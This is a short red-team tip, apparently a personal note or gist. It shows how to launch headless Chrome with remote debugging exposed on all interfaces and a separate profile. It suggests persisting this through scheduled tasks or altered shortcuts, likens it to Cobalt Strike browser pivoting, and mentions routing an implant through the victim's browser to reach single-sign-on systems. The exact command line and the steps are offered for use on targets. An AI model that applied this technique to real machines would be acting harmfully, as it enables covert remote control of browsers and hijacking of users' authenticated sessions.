Start Chrome with the following flags:
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
--remote-debugging-port=9222
--remote-debugging-address=0.0.0.0
--user-data-dir=C:\Temp\remote.profile
--headless
Where dat dir and port are completely arbitrary. Think scheduled task or modifiy shorcuts etc...
For Red Teams, this is basically the equivalent of Cobalt Strike Broswer Pivot.
https://www.cobaltstrike.com/help-browser-pivoting
Also you can route your beacon / implant out a local chrome process.
Browse to chrome://inspect
Add remote target
Win.
refereces https://blog.chromium.org/2011/05/remote-debugging-with-chrome-developer.html
Risk, from the Source you can access systems on the target that leverage single-sign-on etc.... Also explore, Port-Forwarding, etc...
Its just an interesting way to remote control a browser. Probably useful. :)